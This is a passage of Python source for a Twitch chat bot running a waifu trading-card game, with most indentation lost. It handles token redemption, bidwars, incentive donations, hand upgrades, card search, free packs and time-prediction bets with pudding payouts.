"INSERT INTO tokens_claimed (tokenid, userid, points, waifuid, boostername, boosterid, timestamp, badgeID) VALUES(%s, %s, %s, %s, %s, %s, %s, %s)",
[redeemdata[0], tags['user-id'], redeemdata[1], redeemdata[2], redeemdata[3], packid,
current_milli_time(), redeemdata[5]])
# single use?
if redeemdata[4] == 'single':
cur.execute("UPDATE tokens SET claimable = 0 WHERE id = %s", [redeemdata[0]])
# show results
self.message(channel,
"%s -> Successfully redeemed the token %s, added the following to your account -> %s" % (
tags['display-name'], args[0], " and ".join(received[::-1])), isWhisper)
cur.close()
return
if command == "wars":
with db.cursor() as cur:
cur.execute("SELECT id, title FROM bidWars WHERE status = 'open'")
wars = []
warnum = 0
for war in cur.fetchall():
warnum += 1
wars.append("%s%s (!war %s)" % ("; " if warnum > 1 else "", war[1], war[0]))
if len(wars) == 0:
self.message(channel,
"%s, there are no bidwars currently open right now." % tags['display-name'],
isWhisper)
else:
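                    # chunk the list into chat messages of at most roughly 400 characters each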
messages = ["Current Bidwars: "]
for war in wars:
if len(messages[-1]) + len(war) > 400:
messages.append(war)
else:
messages[-1] += war
for message in messages:
self.message(channel, message, isWhisper)
return
if command == "war":
if len(args) != 1:
self.message(channel, "Usage: !war <id>", isWhisper)
return
with db.cursor() as cur:
cur.execute(
"SELECT id, title, status, openEntry, openEntryMinimum, openEntryMaxLength FROM bidWars WHERE id = %s",
[args[0]])
war = cur.fetchone()
if war is None:
self.message(channel, "%s -> Invalid bidwar specified." % tags['display-name'], isWhisper)
return
warid = war[0]
title = war[1]
status = war[2]
openEntry = war[3] != 0
openEntryMinimum = war[4]
openEntryMaxLength = war[5]
# get choices
cur.execute(
"SELECT choice, amount FROM bidWarChoices WHERE warID = %s ORDER BY amount DESC, choice ASC",
[warid])
choices = cur.fetchall()
# render
if len(choices) == 0:
if openEntry and status == 'open':
self.message(channel,
"The %s bidwar has no choices defined yet! Add your own for %d or more points with !vote %s <choice> <points>" % (
title, openEntryMinimum, warid), isWhisper)
else:
# this bidwar was never setup properly, ignore it exists
self.message(channel, "%s -> Invalid bidwar specified." % tags['display-name'], isWhisper)
return
if status == 'closed':
# does the "first place" actually have any votes?
if choices[0][1] == 0:
# no, so this bid war hasn't started yet, don't let on it exists
self.message(channel, "%s -> Invalid bidwar specified." % tags['display-name'], isWhisper)
else:
runnersup = ", ".join("%s (%d points)" % (choice[0], choice[1]) for choice in choices[1:])
self.message(channel,
"The %s bidwar is over! The winner was %s with %d points. Runners up: %s" % (
title, choices[0][0], choices[0][1], runnersup), isWhisper)
else:
# open war
choicesStr = ", ".join("%s (%d points)" % (choice[0], choice[1]) for choice in choices)
msg = "The %s bidwar is currently open! Current votes: %s. !vote %s <choice> <points> to have your say." % (
title, choicesStr, warid)
if openEntry:
msg += " You can add a new choice by contributing at least %d points (%d characters maximum)." % (
openEntryMinimum, openEntryMaxLength)
self.message(channel, msg, isWhisper)
return
if command in ["vote", "donate"] and isMarathonChannel:
# pudding mode?
puddingMode = False
if len(args) > 0 and args[-1].lower() == "pudding":
puddingMode = True
args = args[:-1]
if len(args) == 1:
# special case: is there only 1 incentive and no bidwars?
with db.cursor() as cur:
cur.execute("SELECT COUNT(*) FROM bidWars WHERE `status` = 'open'")
warCount = cur.fetchone()[0] or 0
cur.execute("SELECT COUNT(*) FROM incentives WHERE `status` = 'open'")
incCount = cur.fetchone()[0] or 0
if warCount == 0 and incCount == 1:
# donate to that incentive
cur.execute("SELECT id FROM incentives WHERE `status` = 'open' LIMIT 1")
args = [cur.fetchone()[0]] + args
if len(args) < 2:
if command == "vote":
self.message(channel, "Usage: !vote <warid> <choice> <amount>", isWhisper)
else:
self.message(channel,
"Usage: !donate <id> <amount> (!incentives to see a list of incentives / IDs)",
isWhisper)
return
with db.cursor() as cur:
# find out if this is a bidwar, an incentive or nothing
cur.execute("SELECT id, title, status, openEntry, openEntryMinimum, openEntryMaxLength FROM bidWars WHERE id = %s", [args[0]])
war = cur.fetchone()
if war is not None:
if len(args) < 3:
self.message(channel, "Usage: !vote <warid> <choice> <amount>", isWhisper)
return
warid = war[0]
title = war[1]
status = war[2]
openEntry = war[3] != 0
openEntryMinimum = war[4]
openEntryMaxLength = war[5]
if status == 'closed':
self.message(channel, "%s -> That bidwar is currently closed." % tags['display-name'])
return
# pudding mode?
exchangeRate = int(config["puddingExchangeRateMarathon"])
currency = 'pudding' if puddingMode else 'points'
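                    # pudding contributions are converted to points at the marathon exchange rate; plain point contributions count 1:1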
# check their points entry
try:
points = int(args[-1])
if points <= 0:
raise ValueError()
except ValueError:
self.message(channel, "%s -> Invalid amount of points/pudding entered." % tags['display-name'])
return
if puddingMode:
if not hasPudding(tags['user-id'], points):
self.message(channel, "%s -> You don't have that much pudding!" % tags['display-name'])
return
contribution = points * exchangeRate
contributionStr = "%d pudding (-> %d points)" % (points, contribution)
else:
if not hasPoints(tags['user-id'], points):
self.message(channel, "%s -> You don't have that many points!" % tags['display-name'])
return
contribution = points
contributionStr = "%d points" % points
cur.execute(
"SELECT choice, amount FROM bidWarChoices WHERE warID = %s ORDER BY amount DESC, choice ASC",
[warid])
choices = cur.fetchall()
choiceslookup = [choice[0].lower() for choice in choices]
theirchoice = " ".join(args[1:-1]).strip()
theirchoiceL = theirchoice.lower()
if theirchoiceL not in choiceslookup:
# deal with custom choice entry
if not openEntry:
self.message(channel, "%s -> That isn't a valid choice for the %s bidwar." % (
tags['display-name'], title))
return
for word in bannedWords:
if word in theirchoiceL:
#self.message(channel, ".timeout %s 300" % sender, isWhisper)
self.message(channel,
"%s -> No vulgar choices allowed (warning)" % tags['display-name'])
return
if contribution < openEntryMinimum:
self.message(channel,
"%s -> You must contribute at least %d points or %d pudding to add a new choice to this bidwar!" % (
tags['display-name'], openEntryMinimum, math.ceil(openEntryMinimum / exchangeRate)), isWhisper)
return
if len(theirchoice) > openEntryMaxLength:
self.message(channel,
"%s -> The maximum length of a choice in the %s bidwar is %d characters." % (
tags['display-name'], title, openEntryMaxLength), isWhisper)
return
# all clear, add it
if puddingMode:
takePudding(tags['user-id'], points)
else:
addPoints(tags['user-id'], -points)
actionTime = current_milli_time()
qargs = [warid, theirchoice, contribution, actionTime, tags['user-id'], actionTime, tags['user-id']]
cur.execute(
"INSERT INTO bidWarChoices (warID, choice, amount, created, creator, lastVote, lastVoter) VALUES(%s, %s, %s, %s, %s, %s, %s)",
qargs)
logargs = [tags['user-id'], warid, theirchoice, points, contribution, currency, current_milli_time()]
else:
# already existing choice, just vote for it
if puddingMode:
takePudding(tags['user-id'], points)
else:
addPoints(tags['user-id'], -points)
qargs = [contribution, current_milli_time(), tags['user-id'], warid, theirchoiceL]
cur.execute(
"UPDATE bidWarChoices SET amount = amount + %s, lastVote = %s, lastVoter = %s WHERE warID = %s AND choice = %s",
qargs)
logargs = [tags['user-id'], warid, theirchoiceL, points, contribution, currency, current_milli_time()]
cur.execute("INSERT INTO `contributionLog` (`userid`, `to_id`, `to_choice`, `raw_amount`, `contribution`, `currency`, `timestamp`) " +
"VALUES(%s, %s, %s, %s, %s, %s, %s)", logargs)
self.message(channel, "%s -> Successfully added %s to %s in the %s bidwar." % (
tags['display-name'], contributionStr, theirchoice, title))
return
else:
cur.execute("SELECT id, title, amount, required FROM incentives WHERE id = %s", [args[0]])
incentive = cur.fetchone()
if incentive is None:
self.message(channel, "%s -> Invalid incentive/war ID." % tags['display-name'])
return
incid = incentive[0]
title = incentive[1]
currAmount = incentive[2]
required = incentive[3]
if currAmount >= required:
self.message(channel,
"%s -> The %s incentive has already been met!" % (tags['display-name'], title))
return
try:
points = int(args[1])
if points <= 0:
raise ValueError()
except ValueError:
self.message(channel, "%s -> Invalid amount of points/pudding entered." % tags['display-name'])
return
if puddingMode:
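                        # cap the pudding spend so the converted contribution cannot overshoot what the incentive still needs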
exchangeRate = int(config["puddingExchangeRateMarathon"])
points = min(points, math.ceil((required - currAmount) / exchangeRate))
if not hasPudding(tags['user-id'], points):
self.message(channel, "%s -> You don't have that much pudding!" % tags['display-name'])
return
takePudding(tags['user-id'], points)
contribution = min(points * exchangeRate, required - currAmount)
contributionStr = "%d pudding (-> %d points)" % (points, contribution)
currency = 'pudding'
else:
points = min(points, required - currAmount)
if not hasPoints(tags['user-id'], points):
self.message(channel, "%s -> You don't have that many points!" % tags['display-name'])
return
addPoints(tags['user-id'], -points)
contribution = points
contributionStr = "%d points" % points
currency = 'points'
cur.execute(
"UPDATE incentives SET amount = amount + %s, lastContribution = %s, lastContributor = %s WHERE id = %s",
[contribution, current_milli_time(), tags['user-id'], incid])
logargs = [tags['user-id'], incid, None, points, contribution, currency, current_milli_time()]
cur.execute("INSERT INTO `contributionLog` (`userid`, `to_id`, `to_choice`, `raw_amount`, `contribution`, `currency`, `timestamp`) " +
"VALUES(%s, %s, %s, %s, %s, %s, %s)", logargs)
if contribution + currAmount >= required:
self.message(channel, "%s -> You successfully donated %s and met the %s incentive!" % (
tags['display-name'], contributionStr, title), isWhisper)
else:
self.message(channel,
"%s -> You successfully donated %s towards the %s incentive. It needs %d more points to be met." % (
tags['display-name'], contributionStr, title, required - currAmount - contribution),
isWhisper)
return
if command == "incentives" and (isMarathonChannel or isWhisper):
with db.cursor() as cur:
cur.execute("SELECT id, title, amount, required FROM incentives WHERE status = 'open'")
incentives = []
incnum = 0
for ic in cur.fetchall():
incnum += 1
if ic[2] >= ic[3]:
incentives.append("%s%s (%s) - MET!" % ("; " if incnum > 1 else "", ic[1], ic[0]))
else:
incentives.append(
"%s%s (%s) - %d/%d points" % ("; " if incnum > 1 else "", ic[1], ic[0], ic[2], ic[3]))
if len(incentives) == 0:
self.message(channel,
"%s, there are no incentives currently open right now." % tags['display-name'],
isWhisper)
else:
incentives.append(
". !donate <id> <points> to contribute to an incentive (id is the text in brackets)")
messages = ["Current Open Incentives: "]
for inc in incentives:
if len(messages[-1]) + len(inc) > 400:
messages.append(inc)
else:
messages[-1] += inc
for message in messages:
self.message(channel, message, isWhisper)
return
if command == "upgrade":
user = tags['user-id']
if checkHandUpgrade(user):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
return
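            # the direct-buy price is half of the pack spending still required for the next hand slot, with a floor of 1 point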
spendingsToNext = getNextUpgradeSpendings(user) - getSpendings(user)
multiplier = 0.5 # TODO: Make multiplier configurable
directPrice = max(int(spendingsToNext * multiplier), 1)
if len(args) > 0 and args[0] == "buy":
if hasPoints(user, directPrice):
addPoints(user, directPrice * -1)
addSpending(user, spendingsToNext)
upgradeHand(user, gifted=False)
self.message(channel, "Successfully upgraded {user}'s hand for {price} points!".format(
user=tags['display-name'], price=str(directPrice)), isWhisper=isWhisper)
return
else:
self.message(channel,
"{user}, you do not have enough points to upgrade your hand for {price} points.".format(
user=tags['display-name'], price=str(directPrice)), isWhisper=isWhisper)
return
currLimit = handLimit(tags['user-id'])
msgArgs = (tags['display-name'], currLimit, currLimit + 1, spendingsToNext, directPrice)
self.message(channel, ("%s, you currently have %d slots from pack spending. " +
"For space #%d, spend %d more points or use !upgrade buy for %d points.") % msgArgs,
isWhisper)
return
if command == "announce":
if not (sender in superadmins):
self.message(channel, "Admin Only Command.", isWhisper=isWhisper)
return
if len(args) < 1:
self.message(channel, "Usage: !announce <message>", isWhisper=isWhisper)
return
msg = " ".join(args)
for ch in self.mychannels:
self.message(ch, msg, isWhisper=False)
self.message(channel, "Sent Announcement to all channels.", isWhisper=isWhisper)
return
if command == "search":
if len(args) < 1:
self.message(channel, "Usage: !search <name>[ from <series>]", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
from_index = [arg.lower() for arg in args].index("from")
q = " ".join(args[:from_index])
series = " ".join(args[from_index + 1:])
except ValueError:
q = " ".join(args)
series = None
result = search(q, series)
if len(result) == 0:
self.message(channel, "No waifu found with that name.", isWhisper=isWhisper)
return
if len(result) > 8:
self.message(channel, "Too many results! ({amount}) - try a longer search query.".format(
amount=str(len(result))), isWhisper=isWhisper)
return
if len(result) == 1:
self.message(channel,
"Found one waifu: [{w[id]}][{rarity}]{w[name]} from {w[series]} (use !lookup {w[id]} for more info)".format(
w=result[0], rarity=config['rarity' + str(result[0]['base_rarity']) + 'Name']),
isWhisper=isWhisper)
else:
self.message(channel, "Multiple results (Use !lookup for more details): " + ", ".join(
map(lambda waifu: str(waifu['id']), result)), isWhisper=isWhisper)
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
return
if command == "promote":
self.message(channel,
"Promotion is now automatic when you gather enough copies of a waifu at the same rarity in your hand.",
isWhisper)
return
if command == "recheckpromos" and sender in superadmins:
with db.cursor() as cur:
cur.execute("SELECT DISTINCT waifuid FROM has_waifu WHERE amount >= 2")
rows = cur.fetchall()
ids = [row[0] for row in rows]
attemptPromotions(*ids)
self.message(channel, "Rechecked promotions for %d waifus" % len(ids))
return
if command == "changepromos" and sender in superadmins:
# assumes that the new promotion thresholds have already been inserted
if "promoschanged" in config:
self.message(channel, "Already done.")
return
with db.cursor() as cur:
cur.execute(
"SELECT has_waifu.userid, has_waifu.waifuid, has_waifu.rarity, has_waifu.amount, waifus.base_rarity FROM has_waifu JOIN waifus ON has_waifu.waifuid=waifus.id WHERE rarity < 7")
oldhands = cur.fetchall()
cur.execute("DELETE FROM has_waifu WHERE rarity < 7")
# recalculate qty
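                # the 3 ** (rarity - base_rarity) factor converts promoted copies back into base-rarity copies (3 per promotion step)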
for oldrow in oldhands:
qty = oldrow[3] * (3 ** (oldrow[2] - oldrow[4]))
giveCard(oldrow[0], oldrow[1], oldrow[4], qty)
# recheck promos
cur.execute("SELECT DISTINCT waifuid FROM has_waifu WHERE amount >= 2")
rows = cur.fetchall()
ids = [row[0] for row in rows]
attemptPromotions(*ids)
                # done
config["promoschanged"] = "yes"
cur.execute("REPLACE INTO config(name, value) VALUES('promoschanged', 'yes')")
return
if command == "freepacks" or command == "freepack" or (command == "bet" and len(args) > 0 and args[0].lower() == "packs"):
if len(args) > 0 and args[0].lower() in ["open", "claim", "redeem"]:
if len(args) < 2:
self.message(channel, "Usage: !freepacks open <booster name>", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT remaining, boostername FROM freepacks WHERE userid = %s AND boostername = %s", [tags['user-id'], args[1]])
result = cur.fetchone()
if result is None or result[0] == 0:
self.message(channel, "You don't have any free packs of that type left to claim!", isWhisper)
return
# can they actually open it?
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'",
[tags['user-id']])
boosteropen = cur.fetchone()[0] or 0
if boosteropen > 0:
self.message(channel,
"%s, you can't open a free pack with an open booster! !booster show to check it." %
tags['display-name'], isWhisper)
return
# all good
try:
packid = openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, args[1], False)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
cur.execute("UPDATE freepacks SET remaining = remaining - 1 WHERE userid = %s AND boostername = %s", [tags['user-id'], args[1]])
self.message(channel, "%s, you open a free %s booster: %s/booster?user=%s" % (tags['display-name'], result[1], config["siteHost"], sender), isWhisper)
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "Booster type %s is broken, please fix it." % args[1]
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel,
"There was an error opening your free pack, please try again later.",
isWhisper)
return
return
else:
with db.cursor() as cur:
cur.execute("SELECT boostername, remaining FROM freepacks WHERE userid = %s AND remaining > 0", [tags['user-id']])
freepacks = cur.fetchall()
if len(freepacks) == 0:
self.message(channel, "%s, you don't have any free pack entitlements right now." % tags['display-name'], isWhisper)
else:
freeStr = ", ".join("%s x%d" % (fp[0], fp[1]) for fp in freepacks)
self.message(channel, "%s, your current free packs: %s. !freepacks open <name> to open one." % (tags['display-name'], freeStr), isWhisper)
return
if command == "bet":
if isWhisper:
self.message(channel, "You can't use bet commands over whisper.", isWhisper)
return
if len(args) < 1:
self.message(channel,
"Usage: !bet <time> OR !bet status OR (as channel owner) !bet open OR !bet start OR !bet end OR !bet cancel OR !bet results OR !bet forcereset",
isWhisper)
return
# check restrictions
with db.cursor() as cur:
cur.execute("SELECT betsBanned, forceresetsBanned FROM channels WHERE name = %s", [channel[1:]])
restrictions = cur.fetchone()
if restrictions is None:
# this shouldn't ever happen, but just in case...
self.message(channel, "This isn't a Waifu TCG channel. No can do.", isWhisper)
return
if restrictions[0] != 0:
self.message(channel, "Bets are currently banned in this channel.")
return
canAdminBets = sender in superadmins or (sender in admins and isMarathonChannel)
isBroadcaster = str(tags["badges"]).find("broadcaster") > -1
canManageBets = canAdminBets or isBroadcaster
bet = parseBetTime(args[0])
if bet:
if sender == channel[1:]:
self.message(channel, "You can't bet in your own channel, sorry!", isWhisper)
return
open = placeBet(channel, tags["user-id"], bet["total"])
if open:
self.message(channel,
"Successfully entered {name}'s bet: {h}h {min}min {s}s {ms}ms".format(
h=bet["hours"],
min=bet["minutes"],
s=bet["seconds"],
ms=bet["ms"],
name=tags['display-name']),
isWhisper)
else:
self.message(channel, "The bets aren't open right now, sorry!", isWhisper)
return
else:
subcmd = str(args[0]).lower()
if canManageBets and subcmd == "open":
if openBet(channel):
self.message(channel, "Bets are now open! Use !bet HH:MM:SS(.ms) to submit your bet!")
else:
self.message(channel,
"There is already a prediction contest in progress in your channel! Use !bet status to check what to do next!")
return
elif canManageBets and subcmd == "start":
confirmed = args[-1].lower() == "yes"
try:
startBet(channel, confirmed)
self.message(channel, "Taking current time as start time! Good Luck! Bets are now closed.")
except NotEnoughBetsException:
self.message(channel, "WARNING: This bet does not currently have enough participants to be eligible for payout. To start anyway, use !bet start yes")
except NotOpenLongEnoughException:
self.message(channel, "You must wait at least %d minutes after opening a bet to start it." % int(config["betMinimumMinutesOpen"]))
except NoBetException:
self.message(channel,
"There wasn't an open prediction contest in your channel! Use !bet status to check current contest status.")
return
elif canManageBets and subcmd == "end":
resultData = endBet(str(channel).lower())
if resultData is None:
self.message(channel,
"There wasn't a prediction contest in progress in your channel! Use !bet status to check current contest status.")
else:
formattedTime = formatTimeDelta(resultData["result"])
winners = resultData["winners"]
winnerNames = []
for n in range(3):
winnerNames.append(winners[n]["name"] if len(winners) > n else "No-one")
self.message(channel,
"Contest has ended in {time}! The top 3 closest were: {first}, {second}, {third}".format(
time=formattedTime, first=winnerNames[0], second=winnerNames[1],
third=winnerNames[2]))
if not canAdminBets and len(winners) >= int(config["betMinimumEntriesForPayout"]):
# notify the discordhook of the new bet completion
chanStr = channel[1:].lower()
discordArgs = {"channel": chanStr, "time": formattedTime, "link": "https://twitch.tv/" + chanStr}
discordbody = {
"username": "WTCG Admin",
"content" : "A bet has just finished in {channel} with a time of {time}. Check results and consider payout at <{link}>.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
return
elif canManageBets and subcmd == "cancel":
if cancelBet(channel):
self.message(channel,
"Cancelled the current prediction contest! Start a new one with !bet open.")
else:
self.message(channel,
"There was no open or in-progress prediction contest in your channel! Start a new one with !bet open.")
return
elif subcmd == "status":
# check for most recent betting
cur = db.cursor()
cur.execute(
"SELECT id, status, startTime, endTime FROM bets WHERE channel = %s ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None:
if canManageBets:
self.message(channel,
"No time prediction contests have been done in this channel yet. Use !bet open to open one.")
else:
self.message(channel, "No time prediction contests have been done in this channel yet.")
elif betRow[1] == 'cancelled':
if canManageBets:
self.message(channel,
"No time prediction contest in progress. The most recent contest was cancelled. Use !bet open to open a new one.")
else:
self.message(channel,
"No time prediction contest in progress. The most recent contest was cancelled.")
else:
cur.execute("SELECT COUNT(*) FROM placed_bets WHERE betid = %s", [betRow[0]])
numBets = cur.fetchone()[0]
cur.execute("SELECT bet FROM placed_bets WHERE userid = %s AND betid = %s",
[tags["user-id"], betRow[0]])
placedBets = cur.fetchall()
placedBet = None if len(placedBets) == 0 else placedBets[0][0]
hasBet = placedBet is not None
if betRow[1] == 'open':
if canManageBets:
if hasBet:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. !bet start to close bets and start the run timer. Your bet currently is %s" % (
numBets, formatTimeDelta(placedBet)))
elif not isBroadcaster:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. !bet start to close bets and start the run timer. You have not bet yet." % numBets)
else:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. !bet start to close bets and start the run timer." % numBets)
else:
if hasBet:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. Your bet currently is %s" % (
numBets, formatTimeDelta(placedBet)))
else:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. You have not bet yet." % numBets)
elif betRow[1] == 'started':
elapsed = current_milli_time() - betRow[2]
formattedTime = formatTimeDelta(elapsed)
if canManageBets:
if hasBet:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. !bet end to end the run timer and determine results. Your bet is %s" % (
formattedTime, numBets, formatTimeDelta(placedBet)))
elif not isBroadcaster:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. !bet end to end the run timer and determine results. You did not bet." % (
formattedTime, numBets))
else:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. !bet end to end the run timer and determine results." % (
formattedTime, numBets))
else:
if hasBet:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. Your bet is %s" % (
formattedTime, numBets, formatTimeDelta(placedBet)))
else:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. You did not bet." % (
formattedTime, numBets))
else:
formattedTime = formatTimeDelta(betRow[3] - betRow[2])
paidOut = " and has been paid out" if betRow[1] == 'paid' else ""
if canManageBets:
self.message(channel,
"No time prediction contest in progress. The most recent contest ended in %s with %d bets placed%s. Use !bet results to see full results or !bet open to open a new one." % (
formattedTime, numBets, paidOut))
else:
self.message(channel,
"No time prediction contest in progress. The most recent contest ended in %s with %d bets placed%s." % (
formattedTime, numBets, paidOut))
cur.close()
return
elif canManageBets and subcmd == "results":
cur = db.cursor()
cur.execute("SELECT id, status FROM bets WHERE channel = %s AND `status` != 'open' ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None:
self.message(channel, "No time prediction contests have been done in this channel yet.",
isWhisper)
elif betRow[1] == 'cancelled':
self.message(channel, "The most recent contest in this channel was cancelled.", isWhisper)
elif betRow[1] == 'open' or betRow[1] == 'started':
self.message(channel,
"There is a contest currently in progress in this channel, check !bet status.",
isWhisper)
else:
resultData = getBetResults(betRow[0])
if resultData is None:
self.message(channel, "Error retrieving results.", isWhisper)
cur.close()
return
formattedTime = formatTimeDelta(resultData["result"])
messages = ["The most recent contest finished in %s." % formattedTime]
if len(resultData["winners"]) == 0:
messages[0] += " There were no bets placed."
else:
messages[0] += " Results: "
place = 0
for row in resultData["winners"]:
place += 1
formattedDelta = ("-" if row["timedelta"] < 0 else "+") + formatTimeDelta(
abs(row["timedelta"]))
formattedBet = formatTimeDelta(row["bet"])
entry = "({place}) {name} - {time} ({delta}); ".format(place=place,
name=row["name"],
time=formattedBet,
delta=formattedDelta)
if len(entry) + len(messages[-1]) > 400:
messages.append(entry)
else:
messages[-1] += entry
for message in messages:
self.message(channel, message, isWhisper)
cur.close()
return
elif subcmd == "forcereset" and canManageBets:
# change a started bet to open, preserving all current bets made
with db.cursor() as cur:
cur.execute("SELECT id, status FROM bets WHERE channel = %s ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or betRow[1] != 'started':
self.message(channel, "There is no bet in progress in this channel.", isWhisper)
else:
if '#' + sender == channel:
# own channel, check limit and restriction
if restrictions[1] != 0:
self.message(channel, "This channel is banned from using self forcereset at the present time.")
return
invocation = current_milli_time()
period = invocation - int(config["betForceResetPeriod"])
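                            # broadcasters get at most betForceResetLimit self-resets per rolling betForceResetPeriod window; when exhausted, report when the oldest one expires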
cur.execute("SELECT COUNT(*), MIN(`timestamp`) FROM forceresets WHERE channel = %s AND `timestamp` > %s", [channel, period])
frData = cur.fetchone()
if frData[0] >= int(config["betForceResetLimit"]):
nextUse = int(frData[1]) + int(config["betForceResetPeriod"]) - invocation
a = datetime.timedelta(milliseconds=nextUse, microseconds=0)
datestring = "{0}".format(a).split(".")[0]
self.message(channel, "You are currently out of self forceresets. Your next one will be available in %s." % datestring)
return
cur.execute("INSERT INTO forceresets (channel, user, `timestamp`) VALUES(%s, %s, %s)", [channel, tags['user-id'], invocation])
cur.execute("UPDATE bets SET status = 'open', startTime = NULL WHERE id = %s",
[betRow[0]])
self.message(channel, "Reset the bet in progress in this channel to open status.",
isWhisper)
return
elif subcmd == "changetime" and canAdminBets:
# change the completion time of a completed bet
if len(args) < 2:
self.message(channel, "Usage: !bet changetime <time> (same format as !bet)", isWhisper)
return
ctdata = parseBetTime(args[1])
if not ctdata:
self.message(channel, "Usage: !bet changetime <time> (same format as !bet)", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT id, status FROM bets WHERE channel = %s AND `status` != 'open' ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or betRow[1] != 'completed':
self.message(channel, "There is no just-completed bet in this channel.", isWhisper)
else:
cur.execute("UPDATE bets SET endTime = startTime + %s WHERE id = %s",
[ctdata["total"], betRow[0]])
self.message(channel,
"Successfully changed end time to: {h}h {min}min {s}s {ms}ms".format(
h=ctdata["hours"],
min=ctdata["minutes"],
s=ctdata["seconds"],
ms=ctdata["ms"]),
isWhisper)
return
elif subcmd == "forceenter" and canAdminBets:
if isMarathonChannel:
self.message(channel, "No forceenters allowed in the marathon channel.", isWhisper)
return
# enter another user into a bet
if len(args) < 3:
self.message(channel, "Usage: !bet forceenter <username> <time>", isWhisper)
return
tdata = parseBetTime(args[2])
if not tdata:
self.message(channel, "Usage: !bet forceenter <username> <time>", isWhisper)
return
enteruser = args[1].strip().lower()
if enteruser == sender:
self.message(channel, "You can't force-enter your own time, pls.", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT id, status FROM bets WHERE channel = %s ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or betRow[1] not in ("open", "started"):
self.message(channel,
"There is not a bet in this channel that is eligible for force-entries.",
isWhisper)
else:
# check username
cur.execute("SELECT id FROM users WHERE name = %s", [enteruser])
enteridrow = cur.fetchone()
if enteridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper=isWhisper)
return
enterid = int(enteridrow[0])
cur.execute(
"REPLACE INTO placed_bets (betid, userid, bet, updated) VALUE (%s, %s, %s, %s)",
[betRow[0], enterid, tdata["total"], current_milli_time()])
self.message(channel,
"Successfully entered {user}'s bet: {h}h {min}min {s}s {ms}ms".format(
h=tdata["hours"],
min=tdata["minutes"],
s=tdata["seconds"],
ms=tdata["ms"],
user=enteruser),
isWhisper)
return
elif subcmd == "payout" and canAdminBets:
# pay out most recent bet in this channel
cur = db.cursor()
cur.execute("SELECT COALESCE(MAX(paidAt), 0) FROM bets WHERE channel = %s LIMIT 1", [channel])
lastPayout = cur.fetchone()[0]
currTime = current_milli_time()
if lastPayout > currTime - 79200000 and not isMarathonChannel:
a = datetime.timedelta(milliseconds=int(lastPayout + 79200000 - currTime), microseconds=0)
datestring = "{0}".format(a).split(".")[0]
self.message(channel, "Bet payout may be used again in this channel in %s." % datestring,
isWhisper)
cur.close()
return
cur.execute(
"SELECT id, status, endTime FROM bets WHERE channel = %s AND status IN('completed', 'paid', 'cancelled') ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or (betRow[1] != 'paid' and betRow[1] != 'completed'):
self.message(channel,
"There is no pending time prediction contest to be paid out for this channel.",
isWhisper)
elif betRow[1] == 'paid':
self.message(channel, "The most recent contest in this channel was already paid out.",
isWhisper)
else:
# do the thing
resultData = getBetResults(betRow[0])
if resultData is None:
self.message(channel, "Error retrieving results.", isWhisper)
cur.close()
return
numEntries = len(resultData["winners"])
if numEntries < int(config["betMinimumEntriesForPayout"]):
self.message(channel, "This contest had less than %d entrants, no payout." % int(config["betMinimumEntriesForPayout"]), isWhisper)
cur.close()
return
# calculate first run of prizes
minPrize = int(config["betMinPrize"])
maxPrize = int(config["betMaxPrize"]) * min(1 + numEntries/10, 2)
bbReward = int(config["baseBroadcasterReward"])
canWinBigPrizes = resultData["result"] >= 1800000
whispers = []
prizeStrings = []
place = 0
for winner in resultData["winners"]:
place += 1
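                    # A guess within 1000 ms of the final time wins a booster pack instead of pudding; within 10 ms it upgrades to the almostExactBooster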
if abs(winner["timedelta"]) < 1000 and canWinBigPrizes:
booster = config["sameSecondBooster"]
if abs(winner["timedelta"]) < 10:
booster = config["almostExactBooster"]
giveFreeBooster(winner["id"], booster)
msg = "You won a %s booster from the bet in %s's channel. Open it in any chat with !freepacks open %s" % (booster, channel[1:], booster)
prizeStrings.append("%s - %s pack" % (winner["name"], booster))
cur.execute("UPDATE placed_bets SET prizePack = %s WHERE betid = %s AND userid = %s",
[booster, betRow[0], winner["id"]])
else:
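                        # Interpolate from roughly maxPrize (1st place) down to minPrize (last place); the bonus above minPrize is cut by 1.4 for the bottom half, with further multipliers applied below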
pudding = minPrize + (maxPrize - minPrize) * (numEntries - place) / (numEntries - 1) / (1.4 if place > numEntries / 2 else 1)
if place == 1:
pudding *= 1.3
if isMarathonChannel and booleanConfig("marathonBetBoost"):
pudding *= 1.5
if canWinBigPrizes and abs(winner["timedelta"]) < resultData["result"] / 120:
pudding *= 1.5
if winner["bet"] < resultData["result"] / 2 or winner["bet"] > resultData["result"] * 2:
pudding *= 0.5
pudding = round(pudding)
addPudding(winner["id"], pudding)
